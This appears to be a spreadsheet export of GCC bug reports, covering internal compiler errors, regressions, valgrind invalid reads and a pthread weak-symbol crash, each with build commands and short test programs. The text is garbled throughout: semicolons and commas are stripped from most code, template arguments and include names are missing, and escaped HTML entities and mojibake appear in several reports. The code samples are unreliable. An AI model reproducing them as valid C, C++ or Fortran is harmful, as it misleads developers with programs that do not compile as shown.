eg++-latest -v -I.. -ftemplate-depth-30 -g -DBZ_DEBUG -c extract.cpp
Reading specs from /ufs/newman/users/derrick/gnu/gcc-20010122/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc-20010122/configure --prefix=/ufs/newman/users/derrick/gnu/gcc-20010122
gcc version 2.97 20010122 (experimental)
GNU CPP version 2.97 20010122 (experimental) (cpplib) (i386 Linux/ELF)
GNU CPP version 2.97 20010122 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010122 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 2.97 20010122 (experimental).
ignoring nonexistent directory /ufs/newman/users/derrick/include/g++-v3
ignoring nonexistent directory /ufs/newman/users/derrick/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
ignoring nonexistent directory /ufs/newman/users/derrick/i686-pc-linux-gnu/include
ignoring nonexistent directory /usr/local/include
#include ... search starts here:
#include  search starts here:
 ..
 /ufs/newman/users/derrick/gnu/gcc-20010122/include/g++-v3
 /ufs/newman/users/derrick/gnu/gcc-20010122/i686-pc-linux-gnu/include/g++-v3
 /ufs/newman/users/derrick/gnu/gcc-20010122/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /ufs/newman/users/derrick/gnu/gcc-20010122/i686-pc-linux-gnu/include
 /usr/include
End of search list.
../blitz/array/expr.h: In constructor 
   `blitz::_bz_ArrayExprConstant::_bz_ArrayExprConstant(P_numtype) 
   [with P_numtype = std::complex]':
../blitz/array/expr.h:632:   instantiated from `blitz::_bz_ArrayExprConstant::_bz_ArrayExprConstant(P_numtype) [with P_numtype = std::complex]'
../blitz/array/expr.h:358:   instantiated from `blitz::_bz_ArrayExprOp::_bz_ArrayExprOp(const T1&amp; const T2&amp;) [with T1 = blitz::FastArrayIterator 2&gt; T2 = std::complex P_expr1 = blitz::FastArrayIterator 2&gt; P_expr2 = blitz::_bz_ArrayExprConstant &gt; P_op = blitz::Equal std::complex &gt;]'
../blitz/array/expr.h:142:   instantiated from `blitz::_bz_ArrayExpr::_bz_ArrayExpr(const T1&amp; const T2&amp;) [with T1 = blitz::FastArrayIterator 2&gt; T2 = std::complex P_expr = blitz::_bz_ArrayExprOp 2&gt; blitz::_bz_ArrayExprConstant &gt; blitz::Equal std::complex &gt; &gt;]'
../blitz/array/ops.h:62:   instantiated from `blitz::_bz_ArrayExpr typename blitz::asExpr::T_expr blitz::Equal::T_expr::T_numtype&gt; &gt; &gt; blitz::operator==(const blitz::Array&amp; const T_other&amp;) [with T_numtype1 = std::complex int N_rank1 = 2 T_other = std::complex]'
extract.cpp:61:   instantiated from here
../blitz/array/expr.h:632: Internal error: Segmentation fault.
Please submit a full bug report.
 See  for instructions.
Release:
2.97 20010122 (experimental)
Environment:
System: Linux roadrunner.tapir.caltech.edu 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-20010122/configure --prefix=/ufs/newman/users/derrick/gnu/gcc-20010122</t>
  </si>
  <si>
    <t>derrick</t>
  </si>
  <si>
    <t>GCC-44012</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE: SIGSEGV in ira_merge_allocno_live_ranges</t>
  </si>
  <si>
    <t>Tested revisions:
r159062 - crash
r159045 - crash
r158683 - OK
Output with valgrind:
$ valgrind --trace-children=yes -q /mnt/svn/gcc-trunk/binary-159062-lto-fortran/bin/g++ -O2 -fno-strict-aliasing sqcompiler-noempty.ii
==28996== Invalid read of size 4
==28996==    at 0x801DD0: ira_merge_allocno_live_ranges (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x802FFE: remove_unnecessary_regions (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x80478C: ira_build (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x7FEE2A: rest_of_handle_ira (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x8592BB: execute_one_pass (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x859544: execute_pass_list (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x859556: execute_pass_list (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x94E5B5: tree_rest_of_compilation (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0xAD6CB5: cgraph_expand_function (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0xAD9569: cgraph_optimize (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0xAD9CE4: cgraph_finalize_compilation_unit (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==    by 0x5515EA: cp_write_global_declarations (in /mnt/svn/gcc-trunk/binary-159062-lto-fortran/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus)
==28996==  Address 0xafafafafafafafb7 is not stack'd malloc'd or (recently) free'd
==28996==
sqcompiler-noempty.ii: In member function 'void SQCompiler::BitwiseOrExp()':
sqcompiler-noempty.ii:2877:2: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Testcase will be attached soon.</t>
  </si>
  <si>
    <t>GCC-9765</t>
  </si>
  <si>
    <t>typedefs in base class passed as a template patameter not resolved</t>
  </si>
  <si>
    <t>consider the following code
test_typedef.cc
-------
struct Test {
	typedef int my_type
}
template  struct A : public T {
	A() {
		my_type a // it's line 7
	}
}
----------
Compiler says:
test_typedef.cc: In constructor `A::A()':
test_typedef.cc:7: parse error before `' token
Release:
g++ (GCC) 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
How-To-Repeat:
just compile with g++ no additional options needed</t>
  </si>
  <si>
    <t>antoxa</t>
  </si>
  <si>
    <t>GCC-26765</t>
  </si>
  <si>
    <t>ICE in in extract_insn with __thread and optimization</t>
  </si>
  <si>
    <t>GCC trunk gets this ICE when building glibc. The ICE happens on gcc 4.1 too.
This happens when -O2 is turned on. Here is a reduced testcase to reproduce the problem.
example.c
==================
__thread int *a = 0
void foo (void)
{
  extern int *b
  b = (int *) ((*a))
}
how to reproduce 
mips-elf-gcc -O2 -c example.c
example.c: In function 'foo':
example.c:7: error: unrecognizable insn:
(insn 14 13 15 3 (set (reg/f:SI 193)
        (mem/c/i:SI (lo_sum:SI (reg:SI 195)
                (const:SI (unspec:SI [
                            (symbol_ref:SI (a) [flags 0x22] )
                        ] 114))) [2 a+0 S4 A32])) -1 (nil)
    (nil))
example.c:7: internal compiler error: in extract_insn at recog.c:2036
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-47830</t>
  </si>
  <si>
    <t>errors in intrinsics/c99_functions.c</t>
  </si>
  <si>
    <t>Since 2007-08 roundl() has a version for systems that lack ceill but
have nextafterl. This is the case on NetBSD know. There are two
errors making it non-compileable. Line numbers are different
depending on gcc version so please change
      static long double prechalf = nexafterl (0.5L LDBL_MAX)
to
      long double prechalf = nextafterl (0.5L LDBL_MAX)
This is the orginal code in the latest snapshot:
#else
/* Poor version of roundl for system that don't have ceill.  */
long double
roundl (long double x)
{
  if (x &gt; DBL_MAX || x &lt; -DBL_MAX)
    {
#ifdef HAVE_NEXTAFTERL
      static long double prechalf = nexafterl (0.5L LDBL_MAX)
#else
      static long double prechalf = 0.5L
#endif
      return (GFC_INTEGER_LARGEST) (x + (x &gt; 0 ? prechalf : -prechalf))
    }
  else
    /* Use round().  */
    return round ((double) x)
}
#endif
#endif</t>
  </si>
  <si>
    <t>kuehro</t>
  </si>
  <si>
    <t>GCC-14391</t>
  </si>
  <si>
    <t>-fno-weak vs. __GXX_WEAK__</t>
  </si>
  <si>
    <t>I'd like to be able to test on linux what it's like for those poor souls that
use g++/libstdc++ without support for weak symbols. Suckers!
Look for -fno-weak:
http://gcc.gnu.org/onlinedocs/gcc/C---Dialect-Options.html#C++%20Dialect%20Options
Yeah this works linkage-wise. However using -fno-weak on linux doesn't
undefine __GXX_WEAK__ which makes it less useful for me since this is what the
libstc++ tests use to determine if the active compiler actually use weak symbols.
ie this fails on linux:
g++ -fno-weak test.cc
test.cc:
#if !defined(__GXX_WEAK__)
#error should_be_here
#else
#error should_not_be_here
#endif
gives:
#error should_not_be_here
This has been broken since at least 3.3.2.
-benjamin</t>
  </si>
  <si>
    <t>GCC-63210</t>
  </si>
  <si>
    <t>ira does not select the best register compared with gcc 4.8 for ARM THUMB1</t>
  </si>
  <si>
    <t>Here is a case shown ira does not select the best register compared with gcc 4.8 for ARM Cortex-M0 with options:
-Os -mthumb -mcpu=cortex-m0
int foo1 (int c)
int foo2 (int c)
int test (int c)
{
  return (foo1 (c) || foo2 (c))
}
Its rtl is like:
    2: r115:SI=r0:SI
    7: r0:SI=r115:SI
    8: r0:SI=call [`foo1'] argc:0
    9: r111:SI=r0:SI
    4: r110:SI=0x1
   10: pc={(r111:SI!=0)?L17:pc}
   12: r0:SI=r115:SI
   13: r0:SI=call [`foo2'] argc:0
   14: r112:SI=r0:SI
   16: {r110:SI=r112:SI!=0clobber r118:SI}
   17: L17:
   23: r0:SI=r110:SI
For gcc 4.8 r115 is assigned first which gets r4 since
  Allocno a3r115 of GENERAL_REGS(9) has 4 avail. regs  4-7 ...
Then r110 is assigned to r0. r0:SI=r110:SI can be optimized.
But for trunk/4.9 r110 is assigned first. r110 is conflict with r115 and the confict cost of r0 is high since r0 is not in avail. regs  4-7 for r115. So r110 is not assigned with r0.</t>
  </si>
  <si>
    <t>zhenqiang.chen</t>
  </si>
  <si>
    <t>GCC-3388</t>
  </si>
  <si>
    <t>3.0 bootstrap failure native sparc-sun-solaris2.5.1 fixinc/fixincl.c</t>
  </si>
  <si>
    <t>gcc 3.0 fails to bootstrap with vendor compiler.
vendor compiler is /opt/SUNWspro/bin/cc.
cc -V says: cc: SC3.0.1 13 Jul 1994.
I configured with:
/horton/chastain/baseline/gcc-3.0/configure \
  --prefix=/horton/chastain/localdisk/makita/baseline/gcc-3.0/native/install \
  --disable-shared \
  --with-gnu-as --with-as=/horton/chastain/localdisk/makita/baseline/binutils-2.11/native/install/bin/as \
  --with-gnu-ld --with-ld=/horton/chastain/localdisk/makita/baseline/binutils-2.11/native/install/bin/ld
I built with make bootstrap.
The error is:
cc -c -DIN_GCC -DHAVE_CONFIG_H -g   -I. -I/horton/chastain/baseline/gcc-3.0/gcc/fixinc -I/horton/chastain/baseline/gcc-3.0/gcc/fixinc/.. -I/horton/chastain/baseline/gcc-3.0/gcc/fixinc/../config -I/horton/chastain/baseline/gcc-3.0/gcc/fixinc/../../include /horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c
/horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c line 226: warning: macro replacement within a string literal
/horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c line 226: warning: macro replacement within a string literal
/horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c line 227: newline in string literal
/horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c line 228: syntax error before or at: undef
/horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c line 533: cannot recover from previous errors
cc: acomp failed for /horton/chastain/baseline/gcc-3.0/gcc/fixinc/fixincl.c
make[3]: *** [fixincl.o] Error 2
The source code here is:
  void
  initialize ( argc argv )
    int argc
    char** argv
  {
    static const char var_not_found[] =
      fixincl ERROR:  %s environment variable not defined\n
  #ifdef __STDC__
       each of these must be defined:\n
  #define _ENV_(vmnt) \t n   -  t \n
  ENV_TABLE
  #undef _ENV_
  #endif
Release:
3.0.3 3.1
Environment:
native sparc-sun-solaris2.5
vendor compiler: SC3.0.1 13 Jul 1994
How-To-Repeat:
bootstrap native sparc-solaris-2.5.1 using vendor compiler SC3.0.1 13 Jul 1994</t>
  </si>
  <si>
    <t>chastain</t>
  </si>
  <si>
    <t>GCC-4730</t>
  </si>
  <si>
    <t>ICE on valid input using CALL EXIT(%VAL(...))</t>
  </si>
  <si>
    <t>g77 ICEs on the following code:
      PROGRAM AAP
      IMPLICIT NONE
      INTEGER*8 ZERO
      PARAMETER (ZERO = 0)
      CALL EXIT(%VAL(ZERO))
      END
Release:
several at least 3.0.x
Environment:
Various Linux - probably not important
How-To-Repeat:
g77 -c file.f</t>
  </si>
  <si>
    <t>GCC-1484</t>
  </si>
  <si>
    <t>ICE referencing a template function with -fno-honor-std</t>
  </si>
  <si>
    <t>This gives an ICE with a recent snapshot of 2.97 (20001113)
and just an error with 2.95.2. The error disappears when
namespace std is not involved (both compilers).
#define N std
namespace N {
    template  T foo ()
}
template 
struct C
{
    C () { N::foo() }
}
C c
Release:
2.97 20001113
How-To-Repeat:
gcc -c test.cpp -fno-honor-std   
test.cpp: In constructor `C::C() [with T = int]':
test.cpp:16:   instantiated from here
test.cpp:13: `foo' undeclared in 
   namespace `std'
test.cpp:13: Internal error #980519.
test.cpp:13: Internal compiler error in 
   build_member_call at cp/init.c:1481
   Please submit a full bug report.
   See  for instructions.</t>
  </si>
  <si>
    <t>GCC-63600</t>
  </si>
  <si>
    <t>[5 Regression] ice in ix86_expand_sse2_abs</t>
  </si>
  <si>
    <t>Created attachment 33760
C source code
I just tried to compile the attached code
on gcc trunk dated 20141019 on an AMD x86_64 box.
The compiler said
bug168.c: In function â€˜long_unary_opâ€™:
bug168.c:11345:32: internal compiler error: in ix86_expand_sse2_abs at config/i386/i386.c:45977
  for (n = 0 n = 0) ? (a[n]) : -(a[n]))
                                ^
0xf9ff5e ix86_expand_sse2_abs(rtx_def* rtx_def*)
    ../../src/trunk/gcc/config/i386/i386.c:45977
0x10c707a gen_absv2di2(rtx_def* rtx_def*)
    ../../src/trunk/gcc/config/i386/sse.md:13834
0xb1dc09 insn_gen_fn::operator()(rtx_def* rtx_def*) const
    ../../src/trunk/gcc/recog.h:308
0xb1dc09 maybe_gen_insn(insn_code unsigned int expand_operand*)
    ../../src/trunk/gcc/optabs.c:8348
0xb1dc09 expand_unop_direct
Flag -O3 required. The attached code is the same source
code was provided for bug #53749.</t>
  </si>
  <si>
    <t>GCC-20883</t>
  </si>
  <si>
    <t>unassigned integer used as format</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
write (*i0)i
end</t>
  </si>
  <si>
    <t>GCC-4372</t>
  </si>
  <si>
    <t>#pragma weak pthread* inclusion causes applications to crash without a linker error when one forgets to link with -lpthread</t>
  </si>
  <si>
    <t>Recently my (test) application started to core dump in
__libc_strtol_internal (according to gdb) apparently
called from pthread_getspecific.
It took me awhile to find out that I had forgotten
to add a -lpthread when linking.  I considered it a bug
that the linker didn't give an error so I tried to write
a small test case to reproduce this but in the test case
the linker DID give me `undefined reference to pthread_getspecific'...
After a little investigation I found that the difference
between the test case and the problem case could be brought
back to the *.ii file: the problem case has included a
series of #pragma weak pthread... that caused the linker
to think that these functions are present as local functions
while actually it causes a call to address 0x0 (hence the
`__libc_strtol_internal' I guess).
Because I can not succeed to make a small test case I'll
give results of the my own investigation using the large
problem case:
~/c++/libcw_branch-threading/src/libcwd/tests&gt;g++-3.0.1 -DHAVE_CONFIG_H -I. -I- -I../include -DCWDEBUG -g -D_REENTRANT -c hello_world.cc -save-temps -v
Reading specs from /usr/local/gcc-3.0.1/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: /usr/src/gcc/gcc-3.0.1/configure --prefix=/usr/local/gcc-3.0.1 --enable-shared --with-gnu-as --with-gnu-ld --enable-languages=c++ --enable-debug --enable-threads
Thread model: posix
gcc version 3.0.1
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/gcc-3.0.1/i686-pc-linux-gnu/include
#include ... search starts here:
 .
#include  search starts here:
 ../include
 /usr/local/gcc-3.0.1/include/g++-v3
 /usr/local/gcc-3.0.1/include/g++-v3/i686-pc-linux-gnu
 /usr/local/gcc-3.0.1/include/g++-v3/backward
 /usr/local/include
 /usr/local/gcc-3.0.1/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include
 /usr/include
End of search list.
 /usr/local/gcc-3.0.1/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -fpreprocessed hello_world.ii -quiet -dumpbase hello_world.cc -g -version -o hello_world.s
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.1.
 as --traditional-format -V -Qy -o hello_world.o hello_world.s
GNU assembler version 2.11.90.0.8 (i386-redhat-linux) using BFD version 2.11.90.0.8
Next I edit the *.ii file and remove the #pragma weak lines
showing that these are the problem:
~/c++/libcw_branch-threading/src/libcwd/tests&gt;vi hello_world.ii
~/c++/libding/src/libcwd/tests&gt;/usr/local/gcc-3.0.1/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -fpreprocessed hello_world.ii -quiet -dumpbase hello_world.cc -g -version -o hello_world.s
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.1.
~/c++/libcw_branch-threading/src/libcwd/tests&gt;as --traditional-format -V -Qy -o hello_world.o hello_world.s
GNU assembler version 2.11.90.0.8 (i386-redhat-linux) using BFD version 2.11.90.0.8
~/c++/libcw_branch-threading/src/libcwd/tests&gt;nm hello_world.o | grep pthread
00000330 t _Z20__gthread_mutex_lockP15pthread_mutex_t
00000360 t _Z22__gthread_mutex_unlockP15pthread_mutex_t
         U pthread_create
         U pthread_getspecific
         U pthread_key_create
         U pthread_mutex_lock
         U pthread_mutex_unlock
         U pthread_once
         U pthread_setspecific
Next I do this again but now change a pragma into
#xxxpragma getting:
~/c++/libcw_branch-threading/src/libcwd/tests&gt;vi hello_world.ii
~/c++/libcw_branch-threading/src/libcwd/tests&gt;/usr/local/gcc-3.0.1/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -fpreprocessed hello_world.ii -quiet -dumpbase hello_world.cc -g -version -o hello_world.s
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.1.
In file included from /usr/local/gcc-3.0.1/include/g++-v3/i686-pc-linux-gnu/bits/gthr.h:98
                 from /usr/local/gcc-3.0.1/include/g++-v3/i686-pc-linux-gnu/bits/c++io.h:37
                 from /usr/local/gcc-3.0.1/include/g++-v3/bits/fpos.h:39
                 from /usr/local/gcc-3.0.1/include/g++-v3/bits/std_iosfwd.h:41
                 from /usr/local/gcc-3.0.1/include/g++-v3/bits/std_ios.h:39
                 from /usr/local/gcc-3.0.1/include/g++-v3/bits/std_ostream.h:39
                 from /usr/local/gcc-3.0.1/include/g++-v3/bits/std_iostream.h:40
                 from /usr/local/gcc-3.0.1/include/g++-v3/iostream:31
                 from ../include/libcw/debug.h:81
                 from hello_world_debug.h:18
                 from hello_world.cc:28:
/usr/local/gcc-3.0.1/include/g++-v3/i686-pc-linux-gnu/bits/gthr-default.h:48:2: invalid preprocessing directive #xxxpragma
Apparently the pragma's are in bits/gthr-default.h:48.
Hmm maybe I can reproduce this after all by including
#include  in the small test case...
~&gt;g++-3.0.1 test.cc -o test
~&gt;./test
Segmentation fault (core dumped)
Yup that does the trick.
I think this is highly annoying.  The #pragma weak
should not make the linker think the function exists :/.
Release:
3.0.1
Environment:
i686-rawhide-gnu-linux
How-To-Repeat:
Compile the following code snippet and don't link with
-lpthread (no error occurs):
#include 
#include 
static pthread_once_t S_key_once
static pthread_key_t S_key
void S_destroy(void* tsd_ptr) throw()
{
}
void S_alloc_key(void) throw()
{
  pthread_key_create(
}
int main(void)
{
  pthread_once(
}</t>
  </si>
  <si>
    <t>GCC-67482</t>
  </si>
  <si>
    <t>dwarf2out.c sanitizer detects undefined behaviour negation of -9223372036854775808</t>
  </si>
  <si>
    <t>/* must be compiled with -O2 -g */
/* sanitizer runtime error message
 * gcc-5.2.0/gcc/dwarf2out.c:1532:45: runtime error: negation of -9223372036854775808 cannot be represented in type 'long int [3]' cast to an unsigned type to negate this value to itself */
/* offending statement loc-&gt;dw_loc_next = int_loc_descriptor (-offset) */
/*Target: x86_64-unknown-linux-gnu*/
/*COLLECT_GCC_OPTIONS='-O2' '-g' '-mtune=generic' '-march=x86-64'*/
int v
__attribute__((noinline)) void
bar (void)
{
 v++
}
__attribute__((noinline)) unsigned long long t134_2add (unsigned long long y)
{
 signed long long x = ((-0x7fffffffffffffffLL - 1))
 unsigned long long r
 if (__builtin_add_overflow (x y 
 return r
}</t>
  </si>
  <si>
    <t>GCC-7794</t>
  </si>
  <si>
    <t>[3.3 3.4 regression]: sparc-sun-solaris2.7 RTL checking failures w/-m64 on compile/960704-1.c &amp; execute/991019-1.c</t>
  </si>
  <si>
    <t>I get extra failures w/-m64 when RTL checking is turned on:
FAIL: gcc.c-torture/compile/960704-1.c  -O1
FAIL: gcc.c-torture/compile/960704-1.c  -O2
FAIL: gcc.c-torture/compile/960704-1.c  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/compile/960704-1.c  -O3 -g
FAIL: gcc.c-torture/compile/960704-1.c  -Os
FAIL: gcc.c-torture/execute/991019-1.c compilation  -O1
FAIL: gcc.c-torture/execute/991019-1.c compilation  -O2
FAIL: gcc.c-torture/execute/991019-1.c compilation  -Os
The failures look like this:
compile/960704-1.c:9: internal compiler error: RTL check: expected code `const_double' have `const_int' in compress_float_constant at expr.c:3428
execute/991019-1.c:22: internal compiler error: RTL check: expected code `const_double' have `const_int' in compress_float_constant at expr.c:3428
This is a regression from gcc-3.2
Release:
gcc version 3.3 20020830 (experimental)
Environment:
sparc-sun-solaris2.7
How-To-Repeat:
configure with --enable-checking=rtl and target sparc-sun-solaris2.7 and compile 960704-1.i with:
cc1 -fpreprocessed 960704-1.i -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet -dumpbase 960704-1.c -m64 -auxbase 960704-1 -O1 -version -o 960704-1.s
# 1 960704-1.c
# 1 
# 1 
# 1 960704-1.c
struct A {
  double d
}
struct A f ()
main ()
{
  struct A a = f()
}
or compile 991019-1.i with:
cc1 -fpreprocessed 991019-1.i -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet -dumpbase 991019-1.c -m64 -auxbase 991019-1 -version -o 991019-1.s
# 1 991019-1.c
# 1 
# 1 
# 1 991019-1.c
typedef struct {
     double epsilon
} material_type
material_type foo(double x)
{
     material_type m
     m.epsilon = 1.0 + x
     return m
}
main()
{
  int i
  material_type x
  for (i = 0 i &lt; 10 i++)
    {
      x = foo (1.0)
      if (x.epsilon != 1.0 + 1.0)
        abort ()
    }
  exit (0)
}</t>
  </si>
  <si>
    <t>GCC-7725</t>
  </si>
  <si>
    <t>g++ cannot convert 0 to int* as template arg.</t>
  </si>
  <si>
    <t>template 
class C
{
public:
	C() :p(P) {}
	~C() {}
	int* p
}
int main()
{
    C c
    return 0
}
This code does not work.
g++ does not accept 0 as a valid
template parameter for pointers.
Release:
g++-3.1.1</t>
  </si>
  <si>
    <t>zyzstar</t>
  </si>
  <si>
    <t>GCC-31320</t>
  </si>
  <si>
    <t>Illegal read with gfortran.dg/alloc_comp_assign_2.f90 and *_3.f90</t>
  </si>
  <si>
    <t>gfortran -g gfortran.dg/alloc_comp_assign_2.f90
valgrind ./a.out
==30049== Invalid read of size 1
==30049==    at 0x4C24854: memcpy (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==30049==    by 0x401682: MAIN__ (in /projects/tob/gcc/gcc/testsuite/gfortran.dg/a.out)
==30049==    by 0x405FAB: main (fmain.c:22)
==30049==  Address 0x404D64B is 3 bytes after a block of size 16 alloc'd
==30049==    at 0x4C22C56: malloc (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==30049==    by 0x4E3DD78: _gfortrani_get_mem (memory.c:53)
==30049==    by 0x400A5C: MAIN__ (in /projects/tob/gcc/gcc/testsuite/gfortran.dg/a.out)
==30049==    by 0x405FAB: main (fmain.c:22)
I checked the example itself with g95 and NAG f95 and both fail at the second third and fourth call abort() whereas ifort has a segv.
Is this example (PR 20541) really valid?
A check with NAG f95 g95 and ifort with valgrind shows no problem for NAG f95 and invalid reads for g95 and ifort.
For alloc_comp_assign_3.f90: Compiles with g95 ifort and NAG f95 and gives no call abort() however gfortran has:
==30454== Invalid read of size 1
==30454==    at 0x4C24854: memcpy (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==30454==    by 0x401223: MAIN__ (alloc_comp_assign_3.f90:22)
==30454==    by 0x40444B: main (fmain.c:22)
==30454==  Address 0x404D64B is 3 bytes after a block of size 16 alloc'd
==30454==    at 0x4C22C56: malloc (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==30454==    by 0x4E3DD78: _gfortrani_get_mem (memory.c:53)
==30454==    by 0x400A5C: MAIN__ (alloc_comp_assign_3.f90:19)
==30454==    by 0x40444B: main (fmain.c:22)
For alloc_comp_initializer_1.f90 the same.</t>
  </si>
  <si>
    <t>GCC-59208</t>
  </si>
  <si>
    <t>[4.9 Regression] ice in initialize_flags_in_bb</t>
  </si>
  <si>
    <t>Created attachment 31256
gzipped C++ source code
The source code from bug # 45875 when compiled with today's trunk
of 20131120 says
bug1.cc: In function â€˜void add_button(Widget int&amp; Dimension&amp; DebuggerType EntryType string)â€™:
bug1.cc:48073:13: internal compiler error: in initialize_flags_in_bb at tree-into-ssa.c:459
 static void add_button(Widget form int&amp; row Dimension&amp; max_width
             ^
0xcd9db9 initialize_flags_in_bb
    ../../src/trunk/gcc/tree-into-ssa.c:459
0xcd9db9 mark_block_for_update
    ../../src/trunk/gcc/tree-into-ssa.c:473
0xce1f50 mark_use_interesting
    ../../src/trunk/gcc/tree-into-ssa.c:2456
0xce1f50 prepare_block_for_update
    ../../src/trunk/gcc/tree-into-ssa.c:2531
This worked a few days ago at 20131117 so there is recent breakage.</t>
  </si>
  <si>
    <t>GCC-51046</t>
  </si>
  <si>
    <t>[C++0x] ICE by unexpanded template param pack in range-based for</t>
  </si>
  <si>
    <t>The following ill-formed code results in ICE.
cryolite@blueplanet:~/work/test$ LANG=C /home/cryolite/local/4.7.0/bin/g++-tlimit -v -save-temps -std=c++0x main.cpp
Using built-in specs.
COLLECT_GCC=/home/cryolite/local/4.7.0/bin/g++
COLLECT_LTO_WRAPPER=/home/cryolite/local/4.7.0/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/cryolite/work/intro/gcc-4.7-20111105/configure --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --target=x86_64-unknown-linux-gnu --prefix=/home/cryolite/local/4.7.0 --enable-static --enable-shared --enable-multilib --enable-threads=posix --enable-tls --with-arch-32=i686 --with-tune=generic --enable-bootstrap --enable-languages=cc++ --enable-libssp --enable-libgomp --enable-targets=all --enable-nls --enable-lto --enable-libstdcxx-debug --disable-libstdcxx-pch
Thread model: posix
gcc version 4.7.0 20111105 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /home/cryolite/local/4.7.0/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1plus -E -quiet -v -D_GNU_SOURCE main.cpp -mtune=generic -march=x86-64 -std=c++11 -fpch-preprocess -o main.ii
ignoring nonexistent directory /home/cryolite/local/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/cryolite/local/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0
 /home/cryolite/local/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/x86_64-unknown-linux-gnu
 /home/cryolite/local/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/backward
 /home/cryolite/local/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include
 /usr/local/include
 /home/cryolite/local/4.7.0/include
 /home/cryolite/local/4.7.0/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /home/cryolite/local/4.7.0/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/cc1plus -fpreprocessed main.ii -quiet -dumpbase main.cpp -mtune=generic -march=x86-64 -auxbase main -std=c++11 -version -o main.s
